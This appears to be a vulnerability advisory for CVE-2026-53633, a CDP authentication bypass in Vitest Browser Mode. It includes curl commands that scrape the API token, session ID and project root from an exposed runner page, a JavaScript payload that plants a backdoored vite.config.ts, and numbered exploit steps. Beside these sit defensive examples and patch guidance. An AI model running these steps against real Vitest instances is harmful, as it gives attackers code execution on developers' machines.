Vitest (Browser Mode), Authentication Bypass, CVE-2026-53633 (Critical) -DC-Jun2026-434


The vulnerability arises because Vitest's Browser Mode exposes a `cdp()` API that forwards raw Chrome DevTools Protocol (CDP) methods over the Vitest browser WebSocket RPC. Critically, these CDP operations are not gated by the `browser.api.allowWrite`, `browser.api.allowExec`, `api.allowWrite`, or `api.allowExec` security controls. Consequently, even when write and exec permissions are explicitly disabled (`allowWrite: false`, `allowExec: false`), a malicious client can still use CDP to perform equivalent actions: the permission flags restrict the Vitest RPC methods, but the CDP pass-through sits outside that check.
In the verified proof-of-concept, the attacker first issues CDP's `Page.setDownloadBehavior` command to point the browser's download directory at the project root. They then use `Runtime.evaluate` to inject JavaScript that builds a malicious `vite.config.ts` as a Blob and triggers its download, so the file lands inside the project root. When Vitest detects the changed configuration file and reloads it, the attacker's Node.js code runs on the host machine, achieving remote code execution (RCE).
This becomes remotely exploitable when the Browser Mode API is exposed to the network (e.g., with `--browser.api.host=0.0.0.0`). In that configuration the generated browser runner page leaks every value needed for the attack: `window.VITEST_API_TOKEN`, the active session ID, the project name, and the absolute project root path. An unauthenticated attacker can fetch the page, read those values, connect directly to the browser's WebSocket API, and issue the malicious CDP commands.

DailyCVE Form:

Platform: Vitest (Browser Mode)
Version: 3.0.0 – 3.2.4, 4.0.0 – 4.1.7
Vulnerability: CDP Auth Bypass
Severity: Critical (9.8 CVSS)
Date: 2026-06-01

Prediction: 2026-06-02 (Patched)

What Undercode Say:

Retrieve the victim's browser context metadata to prepare for exploitation.

Extract the API token, session ID, and project root path from the public runner page (substitute the exposed host and port for localhost:63315):

# Capture API token
curl -s http://localhost:63315/__vitest_test__/ | grep -oP 'window.VITEST_API_TOKEN = "\K[^"]+'
# Capture session ID
curl -s http://localhost:63315/__vitest_test__/ | grep -oP '__vitest_browser_runner__.sessionId = "\K[^"]+'
# Capture project root
curl -s http://localhost:63315/__vitest_test__/ | grep -oP '__vitest_browser_runner__.config.root = "\K[^"]+'
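The same extraction as an added JavaScript example (not code from the advisory or from the Vitest project): it parses the three values using the same literal assignment markers the grep commands above match on, and runs over a constructed runner-page fragment with made-up values so it can be tried offline. It also answers the question a defender actually wants answered, whether all three values are present at once. The `probeRunnerPage` helper and the base URL it takes are assumptions for a live check against your own instance.

```javascript
// Added example, not from the advisory or Vitest: parse the metadata the
// advisory says the runner page leaks, keyed on the same string markers the
// page's grep commands use. SAMPLE_RUNNER_PAGE is constructed here; the token,
// session id and path are made-up values.
const SAMPLE_RUNNER_PAGE = `
<!DOCTYPE html>
<html><head><script>
window.VITEST_API_TOKEN = "0123456789abcdef";
</script></head>
<body><script>
window.__vitest_browser_runner__ = {};
__vitest_browser_runner__.sessionId = "sess-42";
__vitest_browser_runner__.config = {};
__vitest_browser_runner__.config.root = "/home/dev/app";
</script></body></html>`;

// One regex per leaked value; dots are escaped so they match literally rather
// than as wildcards, otherwise identical to the grep patterns above.
const MARKERS = {
  apiToken: /window\.VITEST_API_TOKEN = "([^"]+)"/,
  sessionId: /__vitest_browser_runner__\.sessionId = "([^"]+)"/,
  projectRoot: /__vitest_browser_runner__\.config\.root = "([^"]+)"/,
};

// Returns { apiToken, sessionId, projectRoot }, with null for anything absent,
// so a caller can tell "page served, nothing leaked" from "everything leaked".
function extractRunnerMetadata(html) {
  const out = {};
  for (const [name, re] of Object.entries(MARKERS)) {
    const m = re.exec(html);
    out[name] = m ? m[1] : null;
  }
  return out;
}

// The attack needs token, session id and root together; a partial leak is
// still worth fixing but is not the full precondition the advisory describes.
function isFullyExposed(meta) {
  return Object.values(meta).every((v) => v !== null);
}

// Live check against a running instance (hypothetical base URL such as
// "http://127.0.0.1:63315"); the path is the one the curl commands above use.
// Not invoked at load time, so the rest of the block runs offline.
async function probeRunnerPage(baseUrl) {
  const res = await fetch(`${baseUrl}/__vitest_test__/`);
  return extractRunnerMetadata(await res.text());
}
```

Pointing `probeRunnerPage` at a Vitest Browser Mode instance that you own and that is bound to a non-loopback address is a quick way to confirm whether an unpatched version is leaking the full set before an attacker does.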
// Malicious JavaScript payload to be injected via Runtime.evaluate.
// It builds a backdoored Vite config whose plugin hook writes a marker file to
// /tmp/pwned when Vitest loads the config, then saves it as vite.config.ts.
const maliciousConfig = `export default {
  plugins: [{
    name: 'malicious',
    configResolved() {
      require('fs').writeFileSync('/tmp/pwned', 'exploited');
    }
  }]
};`;
// Wrap the config text in a Blob and trigger a download named vite.config.ts.
// With Page.setDownloadBehavior already pointed at the project root, the file
// lands there and Vitest picks it up on its next config reload.
const blob = new Blob([maliciousConfig], {type: 'text/javascript'});
const link = document.createElement('a');
link.href = URL.createObjectURL(blob);
link.download = 'vite.config.ts';
link.click();

Exploit:

  1. Connect to the victim's browser WebSocket API using the stolen API token and session ID.
  2. Issue the CDP `Page.setDownloadBehavior` command to set the download folder to the leaked project root.
  3. Issue CDP `Runtime.evaluate` to execute the malicious JavaScript, which saves the backdoored `vite.config.ts` into the project root.
  4. Wait for Vitest to reload the poisoned config and execute the payload on the host.
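To show concretely why `allowWrite: false` / `allowExec: false` did not help and what a gate on the CDP pass-through has to look like, here is an added example (not Vitest's code and not its patch) that models the `cdp()` forwarder described at the top of the page and drives the exploit sequence just listed through it: an ungated pass-through beside a deny-by-default allowlist keyed on `allowWrite`/`allowExec`. The stub CDP session, the `CDP_POLICY` table, the function names and the option shape are assumptions for illustration; the CDP method names are the real ones.

```javascript
// Added example, not Vitest's code or its patch: a minimal model of a browser
// RPC that forwards raw CDP methods, first ungated (the flaw the advisory
// describes), then gated by a deny-by-default allowlist tied to
// api.allowWrite / api.allowExec. Session stub, policy table and names are
// assumptions; the CDP method strings are real protocol methods.

// Stands in for a real CDP session: records every method it is asked to run.
class FakeCdpSession {
  constructor() { this.calls = []; }
  send(method, params) {
    this.calls.push({ method, params });
    return { ok: true };
  }
}

// The advisory's two-step sequence: point downloads at the project root, then
// run page JavaScript that saves a poisoned vite.config.ts there.
function exploitSequence(projectRoot) {
  return [
    ['Page.setDownloadBehavior', { behavior: 'allow', downloadPath: projectRoot }],
    ['Runtime.evaluate', { expression: '/* build Blob, <a download="vite.config.ts">, click */' }],
  ];
}

// Ungated shape: cdp() is a pass-through, so the write/exec options are never
// consulted and every step reaches the browser.
function makeUngatedRpc(session, _apiOptions) {
  return { cdp: (method, params) => session.send(method, params) };
}

// Gated shape: only listed methods are forwarded, and each entry names the
// capability it needs ('write', 'exec', or null for read-only). Anything not
// listed is refused rather than forwarded, so new CDP methods are safe by default.
const CDP_POLICY = {
  'Runtime.evaluate': 'exec',
  'Runtime.callFunctionOn': 'exec',
  'Page.setDownloadBehavior': 'write',
  'Browser.setDownloadBehavior': 'write',
  'Page.captureScreenshot': null,
};

function makeGatedRpc(session, apiOptions) {
  const granted = { write: !!apiOptions.allowWrite, exec: !!apiOptions.allowExec };
  return {
    cdp(method, params) {
      if (!Object.prototype.hasOwnProperty.call(CDP_POLICY, method)) {
        throw new Error(`CDP method not in allowlist: ${method}`);
      }
      const need = CDP_POLICY[method];
      if (need !== null && !granted[need]) {
        const flag = need === 'write' ? 'allowWrite' : 'allowExec';
        throw new Error(`CDP ${method} requires api.${flag}`);
      }
      return session.send(method, params);
    },
  };
}

// Drives the exploit sequence through an rpc and reports how many steps
// reached the browser plus the first refusal message, if any.
function runExploit(rpc, projectRoot) {
  let forwarded = 0;
  let refused = null;
  for (const [method, params] of exploitSequence(projectRoot)) {
    try {
      rpc.cdp(method, params);
      forwarded += 1;
    } catch (e) {
      if (refused === null) refused = e.message;
    }
  }
  return { forwarded, refused };
}
```

The design point is that the permission check must live on the CDP boundary itself, not only on the named RPC methods, and that it should be an allowlist: a denylist of "dangerous" CDP methods would have to chase every new way of writing files or executing script that the protocol grows.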

Protection:

Update to a patched release immediately: v5.0.0-beta.4, v4.1.8, or v3.2.5. If updating is not possible, never expose the Browser Mode API server to the network (do not set `browser.api.host` to `0.0.0.0`; keep it on the loopback interface) and restrict access to the Vitest API port with firewall rules, since the runner page itself is what hands an attacker the token and session ID.

Impact:

Successful exploitation allows an unauthenticated, remote attacker to execute arbitrary Node.js code on the host machine running Vitest. This leads to a full compromise of the development or testing environment, including data theft, installation of backdoors, or pivoting to internal networks.


Sources:

Reported By: github.com